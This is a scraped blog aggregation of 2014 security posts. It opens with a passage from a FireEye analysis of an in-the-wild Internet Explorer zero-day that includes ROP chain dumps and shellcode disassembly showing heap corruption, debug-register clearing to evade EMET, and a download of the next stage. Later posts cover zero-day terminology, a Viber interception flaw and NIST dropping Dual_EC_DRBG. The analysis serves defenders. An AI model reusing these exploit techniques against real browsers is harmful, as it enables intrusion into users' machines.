The SWF file calls back to Javascript in IE to trigger the IE bug and overwrite the length field of a Flash vector object in the heapspray. The SWF file loops through the heapspray to find the corrupted vector object, and uses it to again modify the length of another vector object. This other corrupted vector object is then used for subsequent memory accesses, which it then uses to bypass ASLR and DEP.</div>
<h3 style="background-color: white; color: #1d252d; font-family: arial, helvetica, clean, sans-serif; font-size: 16px; font-weight: normal; margin: 0px 0px 10px; padding: 0px;">
• Runtime ROP generation</h3>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
With full memory control, the exploit will search for <em>ZwProtectVirtualMemory</em>, and a stack pivot (opcode 0×94 0xc3) from NTDLL. It also searches for <em>SetThreadContext</em> in kernel32, which is used to clear the debug registers. This technique, documented <a href="http://piotrbania.com/all/articles/anti_emet_eaf.txt" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">here</a>, may be an attempt to bypass protections that use hardware breakpoints, such as EMET’s EAF mitigation.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
With the addresses of the aforementioned APIs and gadget, the SWF file constructs a ROP chain, and prepends it to its RC4 decrypted shellcode. It then replaces the vftable of a sound object with a fake one that points to the newly created ROP payload. When the sound object attempts to call into its vftable, it instead pivots control to the attacker’s ROP chain.</div>
<h3 style="background-color: white; color: #1d252d; font-family: arial, helvetica, clean, sans-serif; font-size: 16px; font-weight: normal; margin: 0px 0px 10px; padding: 0px;">
• ROP and Shellcode</h3>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The ROP payload basically tries to make memory at <em>0×18184000 </em>executable, and to return to <em>0x1818411c </em>to execute the shellcode.</div>
<pre style="background-color: white; color: #5b6770; font-size: 13px; line-height: 13px; padding: 0px;">0:008> dds eax
18184100 770b5f58 ntdll!ZwProtectVirtualMemory
18184104 1818411c
18184108 ffffffff
1818410c 181840e8
18184110 181840ec
18184114 00000040
18184118 181840e4</pre>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Inside the shellcode, it saves the current stack pointer to <em>0×18181800 </em>to safely return to the caller.</div>
<pre style="background-color: white; color: #5b6770; font-size: 13px; line-height: 13px; padding: 0px;">mov dword ptr ds:[18181800h],ebp</pre>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Then, it restores the flash.Media.Sound vftable and repairs the corrupted vector object to avoid application crashes.</div>
<pre style="background-color: white; color: #5b6770; font-size: 13px; line-height: 13px; padding: 0px;">18184123 b820609f06 mov eax,69F6020h
18184128 90 nop
18184129 90 nop
1818412a c700c0f22169 mov dword ptr [eax],offset Flash32_11_7_700_261!AdobeCPGetAPI+0x42ac00 (6921f2c0)
18184133 b800401818 mov eax,18184000h
18184138 90 nop
18184139 90 nop
1818413a c700fe030000 mov dword ptr [eax],3FEh ds:0023:18184000=3ffffff0</pre>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The shellcode also recovers the ESP register to make sure the stack range is in the current thread stack base/limit.</div>
<pre style="background-color: white; color: #5b6770; font-size: 13px; line-height: 13px; padding: 0px;">18184140 8be5 mov esp,ebp
18184142 83ec2c sub esp,2Ch
18184145 90 nop
18184146 eb2c jmp 18184174</pre>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The shellcode calls SetThreadContext to clear the debug registers. It is possible that this is an attempt to bypass mitigations that use the debug registers.</div>
<pre style="background-color: white; color: #5b6770; font-size: 13px; line-height: 13px; padding: 0px;">18184174 57 push edi
18184175 81ece0050000 sub esp,5E0h
1818417b c7042410000100 mov dword ptr [esp],10010h
18184182 8d7c2404 lea edi,[esp+4]
18184186 b9dc050000 mov ecx,5DCh
1818418b 33c0 xor eax,eax
1818418d f3aa rep stos byte ptr es:[edi]
1818418f 54 push esp
18184190 6afe push 0FFFFFFFEh
18184192 b8b308b476 mov eax,offset kernel32!SetThreadContext (76b408b3)
18184197 ffd0 call eax</pre>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The shellcode calls <em>URLDownloadToCacheFileA </em>to download the next stage of the payload, disguised as an image.</div>
<h2 style="background-color: white; color: #c8102e; font-family: arial, helvetica, clean, sans-serif; font-size: 18px; font-weight: normal; margin: 0px 0px 10px; padding: 0px 0px 4px;">
Mitigation</h2>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Using EMET may break the exploit in your environment and prevent it from successfully controlling your computer.<strong>EMET versions 4.1 and 5.0 break (and/or detect) the exploit in our tests.</strong><br /><strong>Enhanced Protected Mode in IE breaks the exploit in our tests.</strong> EPM was introduced in IE10.<br />Additionally, the attack will not work without Adobe Flash. <strong>Disabling the Flash plugin within IE will prevent the exploit from functioning.</strong></div>
<h2 style="background-color: white; color: #c8102e; font-family: arial, helvetica, clean, sans-serif; font-size: 18px; font-weight: normal; margin: 0px 0px 10px; padding: 0px 0px 4px;">
Threat Group History</h2>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The APT group responsible for this exploit has been the first group to have access to a select number of browser-based 0-day exploits (e.g. IE, Firefox, and Flash) in the past. They are extremely proficient at lateral movement and are difficult to track, as they typically do not reuse command and control infrastructure. They have a number of backdoors including one known as Pirpi that we previously discussed <a href="http://www.fireeye.com/blog/technical/botnet-activities-research/2010/11/ie-0-day-hupigon-joins-the-party.html" style="color: #4298b5; font-weight: bold; text-decoration: none;">here</a>. CVE-2010-3962, then a 0-day exploit in Internet Explorer 6, 7, and 8 dropped the Pirpi payload discussed in this previous case.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
As this is still an active investigation we are not releasing further indicators about the exploit at this time.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<a href="http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html" target="_blank">http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-48640550954459192842014-04-28T21:24:00.003-07:002014-04-28T21:24:44.012-07:00[fireeye] Zero-Day Attacks are not the same as Zero-Day Vulnerabilities<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
When it comes to “zero-days,” there is much room for confusion in terms of definition and priority. At FireEye, we follow the industry-standard term of “zero-day attacks.”<strong> This term is defined as software or hardware vulnerabilities that have been exploited</strong> by an attacker where there is <strong>no prior knowledge of the flaw in the general information security community</strong>, and, therefore, no vendor fix or software patch available for it.</div>
<a name='more'></a><br />
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Here is the <a href="http://en.wikipedia.org/wiki/Zero-day_attack" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">Wikipedia definition</a>:</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<i>“A <b>zero-day</b> (or <b>zero-hour</b> or <b>day zero</b>) <b>attack</b> or </i><a href="http://en.wikipedia.org/wiki/Threat_(computer)" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank" title="Threat (computer)"><b><i>threat</i></b></a><i> is an </i><a href="http://en.wikipedia.org/wiki/Attack_(computing)" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank" title="Attack (computing)"><i>attack</i></a><i> that exploits a previously unknown </i><a href="http://en.wikipedia.org/wiki/Vulnerability_(computing)" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank" title="Vulnerability (computing)"><i>vulnerability</i></a><i> in a </i><a href="http://en.wikipedia.org/wiki/Application_software" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank" title="Application software"><i>computer application</i></a><i>, one that developers have not had time to address and patch.</i><a href="http://en.wikipedia.org/wiki/Zero-day_attack#cite_note-1" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank"><i><span style="font-size: 12px; position: relative; top: -0.4em; vertical-align: text-top;">[1]</span></i></a><i> There are zero days between the time the vulnerability is discovered (and made public), and the first attack.”</i></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Many security researchers identify vulnerabilities – some as a byproduct of attack detection and others as a core focus. With the exception of vulnerabilities identified by black hat hackers for use in attacks, nearly all vulnerabilities are responsibly, and confidentially, sent to the party responsible for the creation of the software so that fixes can be made. These can range from critical holes like those we found exploited in globally popular software like Internet Explorer to the never-exploited ones in rarely used applications.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
FireEye has demonstrated unparalleled capabilities finding zero-day exploits that are “<b>in the wild,</b>” meaning the vulnerability is being used by criminals and threat actors for malicious purposes. In 2013, FireEye discovered <b>11</b> zero-day exploits that were actively in use by advanced threat actors and has already discovered an additional <b>two</b> in 2014. Zero-day exploits already in use by APT actors represent the most critical cyber threat to the CISOs of organizations. Even if APT actors do not target an organization, other criminal exploit authors will often reverse the zero-day exploit and create their own version before patches can be released.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
At FireEye, we examine data from over 2 million virtual machines located in every corner of the globe, resulting in near instantaneous threat intelligence and threat metrics being captured in our Dynamic Threat Intelligence™ (DTI) cloud. This intelligence allows us to evaluate the entire attack life cycle, or “kill chain,” of an attack and view the behaviors of the attacker. FireEye examines all of the tools, tactics and procedures (TTPs) used by attackers to create an initial compromise, establish a foothold, escalate privileges, conduct internal reconnaissance, move laterally, maintain persistence, and finally complete their mission.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<a href="http://www.fireeye.com/blog/wp-content/uploads/2014/04/Killchain.png" style="color: #4298b5; font-weight: bold; text-decoration: none;"><img alt="Killchain" class="aligncenter size-full wp-image-5298" height="330" src="http://www.fireeye.com/blog/wp-content/uploads/2014/04/Killchain.png" style="border: 0px; max-width: 98%;" width="900" /></a></div>
<div align="center" style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Figure 1. The attack lifecycle</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Our focus is to create a holistic view towards security at every step in the attack lifecycle, of which identification of zero-day exploits in use by malicious actors plays one component. We also contribute back to the security research community by sharing detailed, comprehensive views on attack lifecycles, for example in <a href="http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html" style="color: #4298b5; font-weight: bold; text-decoration: none;">Operation Ephemeral Hydra</a>. At FireEye, our defense strategy encompasses all malicious activities you may find on your network, or on your endpoints – including those that leverage zero-day vulnerabilities and those that do not.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<a href="http://www.fireeye.com/blog/corporate/2014/04/zero-day-attacks-are-not-the-same-as-zero-day-vulnerabilities.html" target="_blank">http://www.fireeye.com/blog/corporate/2014/04/zero-day-attacks-are-not-the-same-as-zero-day-vulnerabilities.html</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-9209288070514542852014-04-24T21:03:00.005-07:002014-04-24T21:03:57.241-07:00[securityaffairs] Viber vulnerable to MITM attack, million users at risk<h2 align="justify" class="post-title entry-title url" style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 1.3em; line-height: 26.399999618530273px; margin: 0px; padding: 15px 0px 5px;">
Security researchers at UNH Cyber Forensics Research & Education Group have discovered a serious flaw in Viber messaging and voice system.<a name='more'></a></h2>
<div class="post-body entry-content" style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px;">
<div class="articlebodyonly" id="articlebodyonly" style="color: black;">
<div id="aim12673910930518773921">
<div dir="ltr">
<div dir="ltr">
<div>
Mobile app security is one of principal concern for security experts, exploiting flaws in most popular application like <a href="http://securityaffairs.co/wordpress/23046/hacking/whatsapp-flaw-private-chats.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="WhatsApp flaw allows hackers to steal private Chats on Android devices">WhatsApp</a>, <a href="http://securityaffairs.co/wordpress/24013/hacking/flickr-affected-critical-sql-injection-remote-code-execution-bugs.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Flickr affected by critical SQL Injection and Remote Code Execution bugs">Flickr</a> or Viber hackers could expose data of million end users.</div>
<div>
Last week a group of researchers <span class="GINGER_SOFTWARE_mark" id="faca9c8a-174b-4d68-8517-41bc1333a6cd">at</span> UNH Cyber Forensics Research & Education Group discovered a vulnerability in <a href="http://securityaffairs.co/wordpress/24060/hacking/intelligence-exploit-whatsapp-bug-track-users-location.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Intelligence could exploit Whatsapp bug to track users location">WhatsApp</a> “Location Share” feature which exposes user’s location to the attackers.</div>
<div>
The same group examined another popular messaging app, Viber, finding that it lacks an implementation of security best practices threatening the <a href="http://securityaffairs.co/wordpress/13191/laws-and-regulations/the-legislation-of-privacy-new-laws-that-will-change-your-life.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="The Legislation of Privacy: New Laws That Will Change Your Life">privacy</a> of more than 150 million users.</div>
<div>
</div>
<div>
Viber application, available for Android, <span class="GINGER_SOFTWARE_mark" id="2b8928bf-b4af-40e0-a779-8293d6ab7db9"></span><span class="GINGER_SOFTWARE_mark" id="2b8928bf-b4af-40e0-a779-8293d6ab7db9"></span><span class="GINGER_SOFTWARE_mark" id="2b8928bf-b4af-40e0-a779-8293d6ab7db9"></span><span class="GINGER_SOFTWARE_mark" id="2b8928bf-b4af-40e0-a779-8293d6ab7db9"></span><span class="GINGER_SOFTWARE_mark" id="2b8928bf-b4af-40e0-a779-8293d6ab7db9">iOS</span>, Windows Phone, Blackberry and Desktop, provides a free voice calling service to its users, and it also allows them to share text messages, videos and their position.</div>
</div>
</div>
</div>
<div id="aim22673910930518773921">
<div>
</div>
<div>
The researchers discovered that users’ data is stored in an unencrypted form on the Viber Amazon Servers. According the researchers images and videos of any Viber user could be easily accessed without any <a href="http://securityaffairs.co/wordpress/14767/security/two-factor-authentication-security.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Two-factor authentication, necessary but not sufficient to be safe">authentication</a>, an attacker can simply intercept a link from Viber, in a classic <a href="http://securityaffairs.co/wordpress/22449/hacking/whatsapp-lack-certificate-pinning.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="WhatsApp lack enforcing certificate pinning, users exposed to MITM">MITM</a> attack scenario, users to access victim’s data.</div>
<div>
In the following image is reproduced a typical attack scenario on Viber user, it is easy to understand that an attacker can use any network testing tool available on the market, such as NetworkMiner, Wireshark, and NetWitness, to sniff the Viber traffic.</div>
<div>
<blockquote class="tr_bq" style="border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
“<i>Anyone, including the service providers will be able to collect this information – and anyone that sets up a rogue AP, or any man-in-the middle attacks such as ARP poisoning will be able to capture this unencrypted traffic and view the images and videos received as well as the locations being sent or received by a <span class="GINGER_SOFTWARE_mark" id="1ba51516-fc77-4b19-b8b6-7e7c552f3bfa"><span class="GINGER_SOFTWARE_mark" id="565b72a4-0efd-4ec9-a9fa-dbb18e38187f"><span class="GINGER_SOFTWARE_mark" id="5a6e5260-9ea5-4fec-a06f-bfb1b6a97c59"><span class="GINGER_SOFTWARE_mark" id="8bc5434a-decc-42f9-944c-66dafda5ea55"><span class="GINGER_SOFTWARE_mark" id="5c46bcf4-1cfa-4629-9112-8af2b23a0948"><span class="GINGER_SOFTWARE_mark" id="353bf4a9-dbdc-459c-9cad-75b79ecf362c">phone</span></span></span></span></span></span>.</i>” said Professor <i>Ibrahim Baggili and Jason </i><i></i><i></i><i></i><i></i><i>Moore</i><i></i><i></i><i></i><i></i><i></i><i></i><span class="GINGER_SOFTWARE_mark" id="5f6cee1c-ca91-4148-aaea-57e24dc96701"><i> </i><span class="GINGER_SOFTWARE_mark" id="3eedaecf-2f02-45df-94a3-4dc6c2d84d7e">.</span></span><span class="GINGER_SOFTWARE_mark" id="3eedaecf-2f02-45df-94a3-4dc6c2d84d7e"></span></div>
</blockquote>
</div>
<div>
</div>
<div>
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Viber-attack-scenario.png" style="color: #4265a7; font-weight: bold; text-decoration: none;"><img alt="Viber attack scenario" class="aligncenter wp-image-24308" height="273" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Viber-attack-scenario.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="Viber vulnerable to MITM attack, million users at risk" width="487" /></a></div>
<div>
</div>
<div>
</div>
<div>
In a video, the researchers demonstrated that V<span class="GINGER_SOFTWARE_mark" id="15fef9f7-562b-499d-a48f-bc0bc3711b58">iber</span> is not <span class="GINGER_SOFTWARE_mark" id="144040c7-7a05-4ab6-a1e2-bd7bd0944d09">encrypting</span> any data such as images, doodles, videos and location images while exchanging it with their Amazon server, that allows an attacker to capture this unencrypted traffic with <a href="http://thehackernews.com/search/label/Man-in-the-Middle" style="color: #3d5a99; font-weight: bold; text-decoration: none;" target="_blank">man-in-the middle attack</a>.</div>
<blockquote style="border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<em>“<span style="color: #01153b;">The main issue is that the above-mentioned data is unencrypted, leaving it open for interception through either a Rogue AP, or any man-in-the middle attacks. </span>“</em></blockquote>
<div>
The researchers have written a <a href="http://www.unhcfreg.com/#!Viber-Security-Vulnerabilities-Do-not-use-Viber-until-these-issues-are-resolved/c5rt/BB4208CF-7F0A-4DE1-92A4-529425549683" rel="nofollow" style="color: #3d5a99; font-weight: bold; text-decoration: none;" target="_blank" title="Viber flaws">blog post</a> to invite users to stop using Viber until the company will fix these private issues.</div>
<div>
The experts have ethically reported the flaw to Viber security team, in time I’m writing they still haven’t received any response.</div>
<div>
</div>
<div>
Let’s see what happen<span class="GINGER_SOFTWARE_mark" id="6409b603-2311-4143-875e-9855138f62d7"> …</span> meantime, put your privacy <span class="GINGER_SOFTWARE_mark" id="584160af-a0ab-4643-9247-a8b29a6bcff8">at</span> <span class="GINGER_SOFTWARE_mark" id="d9ba72d9-45c3-4bcd-97db-9431f7d5a1bd">first place</span>!</div>
<div>
<a href="http://securityaffairs.co/wordpress/24305/hacking/viber-vulnerable-mitm.html" target="_blank">http://securityaffairs.co/wordpress/24305/hacking/viber-vulnerable-mitm.html</a></div>
</div>
</div>
</div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-80980149729111622952014-04-24T21:02:00.002-07:002014-04-24T21:02:27.649-07:00[securityaffairs] NIST removes Dual_EC_DRBG algorithm from Draft Guidance suggesting to abandon it<h2 style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 1.3em; line-height: 26.399999618530273px; margin: 0px; padding: 15px 0px 5px;">
The NIST announced it will request final public comments before Dual_EC_DRBG generator is officially removed from NIST Special Publication 800-90A, Rev.1<a name='more'></a></h2>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The National Institute of Standards has decided to abandon Dual Elliptic Curve Deterministic Random Bit Generator (Dual_EC_DRBG<span class="GINGER_SOFTWARE_mark" id="f0fee744-7b08-419c-9adb-8511214f5606"> )</span> in response to the controversy raised after the revelation made by <a href="http://securityaffairs.co/wordpress/15133/intelligence/edward-snowden-is-the-responsible-for-disclosure-of-prism-program.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Edward Snowden is the responsible for disclosure of PRISM program">Edward Snowden</a>. In December the whistleblower leaked documents reporting that <a href="http://securityaffairs.co/wordpress/23607/intelligence/rsa-helped-nsa-again.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="RSA is accused again to have helped NSA to weaken security products">RSA</a> signed a secret $10 million contract with the National Security Agency to implement as the default choice the flawed Dual_EC_DRBG algorithm in its <span class="GINGER_SOFTWARE_mark" id="e6e42db9-d4eb-41d4-8427-16e84981b97c">bSafe</span> Security solution.</div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
RSA always <a href="http://securityaffairs.co/wordpress/20717/intelligence/rsa-refused-claims.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="RSA refused claims on NSA Relationship and encryption backdoor">denied</a> all the accusations, the company published a blog post, refusing inferences on the secret partnership with the <a href="http://securityaffairs.co/wordpress/23550/hacking/gchq-nsa-spied-politics.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="How GCHQ and NSA spied on German citizens and global politics">National Security Agency</a> and the use of flawed algorithm in its product as default choice.</div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/NIST-DUAL_EC_DRBG.png" style="color: #4265a7; font-weight: bold; text-decoration: none;"><img alt="NIST DUAL_EC_DRBG" class="aligncenter wp-image-24299" height="160" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/NIST-DUAL_EC_DRBG.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="NIST removes Dual EC DRBG algorithm from Draft Guidance suggesting to abandon it" width="498" /></a></div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
NIST is immediately ran for cover, it published an official announcement titled “<a href="http://www.nist.gov/itl/csd/sp800-90-042114.cfm" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="http://www.nist.gov/itl/csd/sp800-90-042114.cfm">NIST Removes Cryptography Algorithm from Random Number Generator Recommendations</a>” to recommend citizens to abandon the Dual_EC_DRBG informing them that it has been <span style="color: black;">removed from its draft guidance on random number generators. </span>NIST <span class="GINGER_SOFTWARE_mark" id="eb92cb7e-9bee-4582-a031-15e1618eb38e">suggests</span> the adoption of one of <span class="GINGER_SOFTWARE_mark" id="b5aba486-cf82-4dae-922e-bfe96a38bc1a">the </span>three remaining approved algorithms in the publication, the Hash_DRBG, HMAC_DRBG, and CTR_DRBG.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“<span style="color: black;">Following a public comment period and review, the National Institute of Standards and Technology (NIST) has removed a cryptographic algorithm from its draft guidance on random number generators. Before implementing the change, NIST <span class="GINGER_SOFTWARE_mark" id="944f580c-c97f-4c4f-a573-6e1e7526a942"><span class="GINGER_SOFTWARE_mark" id="ad337e50-3701-4431-9dca-81341436df8f"><span class="GINGER_SOFTWARE_mark" id="6fa0aa79-8d78-4ffa-bc74-75061b4e4b65"><span class="GINGER_SOFTWARE_mark" id="c0bef365-c72d-438b-ac3a-1ccd1bee926d"><span class="GINGER_SOFTWARE_mark" id="1aee228a-39ca-4f01-a1d5-e8056afa5f32"><span class="GINGER_SOFTWARE_mark" id="f17aaa29-0e6a-41e2-a9ac-7ab4121ebffd"><span class="GINGER_SOFTWARE_mark" id="aff26dd5-b9a6-4890-8e91-037afb06f6a2">is requesting</span></span></span></span></span></span></span> final public comments on the revised document, </span><a href="http://csrc.nist.gov/news_events/index.html#apr21" style="color: steelblue; font-weight: bold; text-decoration: none;">Recommendation for Random Number Generation Using Deterministic Random Bit Generators</a><span style="color: black;"> (NIST Special Publication 800-90A, Rev. 1).</span>“</em></div>
</blockquote>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Be aware, NIST didn’t remove it from its random number generator recommendations to allow researchers to review the encryption standard and its robustness.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“Some commenters expressed <span class="GINGER_SOFTWARE_mark" id="bfc019fa-6250-49d5-b381-ea99cb61ca83"><span class="GINGER_SOFTWARE_mark" id="49abdd60-787e-4ae9-91d4-4ac58f08a884"><span class="GINGER_SOFTWARE_mark" id="38f515d6-6601-4f85-8b22-ca549ae27dad"><span class="GINGER_SOFTWARE_mark" id="ecb502ab-f28b-4ae3-bb17-df5710dc1580"><span class="GINGER_SOFTWARE_mark" id="485f288c-0af4-4e7b-b2db-b3a152226537"><span class="GINGER_SOFTWARE_mark" id="2b7af420-dd30-424b-88c2-35efd79aac38">concerns</span></span></span></span></span></span> that the algorithm contains a weakness that would allow attackers to figure out the secret cryptographic keys and defeat the protections provided by those keys. Based on its own evaluation, and in response to the lack of public confidence in the algorithm, NIST removed Dual_EC_DRBG from the Rev. 1 document. </em><em>The revised SP 800-90A is available at <a href="http://csrc.nist.gov/news_events/index.html#apr21" style="color: steelblue; font-weight: bold; text-decoration: none;">http://csrc.nist.gov/news_events/index.html#apr21</a> along with instructions for submitting comments.”</em></div>
</blockquote>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The operation aims to give more transparency to the cyber security community on algorithm efficiency.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
“<em>We want to assure the IT cyber security community that the transparent, public process used to rigorously vet our standards is still in place. NIST would not deliberately weaken a cryptographic standard,</em>” was reported by NIST.</div>
</blockquote>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
NIST recommends the vendors currently using Dual_EC_DRBG in their products to select an alternative algorithm and not wait for further revision of the revised document.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
“<em>If a product uses Dual_EC_DRBG as the default random number generator, it may be possible to reconfigure the product to use a different default algorithm.</em>” reports the NIST.</div>
</blockquote>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
NIST announced that that the public comment period on Special Publication 800-90A will close on May 23th.</div>
